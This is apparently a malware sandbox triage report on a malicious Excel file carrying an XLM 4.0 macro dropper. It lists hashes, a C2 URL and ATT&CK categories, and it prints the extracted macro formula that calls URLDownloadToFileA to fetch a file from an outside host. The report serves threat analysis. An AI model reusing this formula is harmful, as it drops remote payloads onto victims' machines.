fa75ad49ae3f01c066c035c79098f15915375e8ead1840bee03cb16fafd98425 | Triage

Sharing

General

Target

document-1851347184.xls
Size

39KB
Sample

210306-sc36ftcaks
MD5

8a90be28fd5b15dac37b54acf61257dd
SHA1

e7e8c7afa5b6912cfbef5813b54561f5c4cdc222
SHA256

fa75ad49ae3f01c066c035c79098f15915375e8ead1840bee03cb16fafd98425
SHA512

5e2eb198ca5cae3a7d314c0f4cfd6c61d5114a5737bfe4379bd0225f2cb21ad00b20b9c0443ab61bb8b6c208e4a3ff42a4c2d65832909c7fabaadfebb516f950

Score

10^/10

macro xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://ttj10qrrqx03kdts.com/inda.xls

Attributes

formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://ttj10qrrqx03kdts.com/inda.xls

Targets

- Target
  
  document-1851347184.xls
- Size
  
  39KB
- MD5
  
  8a90be28fd5b15dac37b54acf61257dd
- SHA1
  
  e7e8c7afa5b6912cfbef5813b54561f5c4cdc222
- SHA256
  
  fa75ad49ae3f01c066c035c79098f15915375e8ead1840bee03cb16fafd98425
- SHA512
  
  5e2eb198ca5cae3a7d314c0f4cfd6c61d5114a5737bfe4379bd0225f2cb21ad00b20b9c0443ab61bb8b6c208e4a3ff42a4c2d65832909c7fabaadfebb516f950
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
behavioral1 behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

static1

behavioral1

behavioral2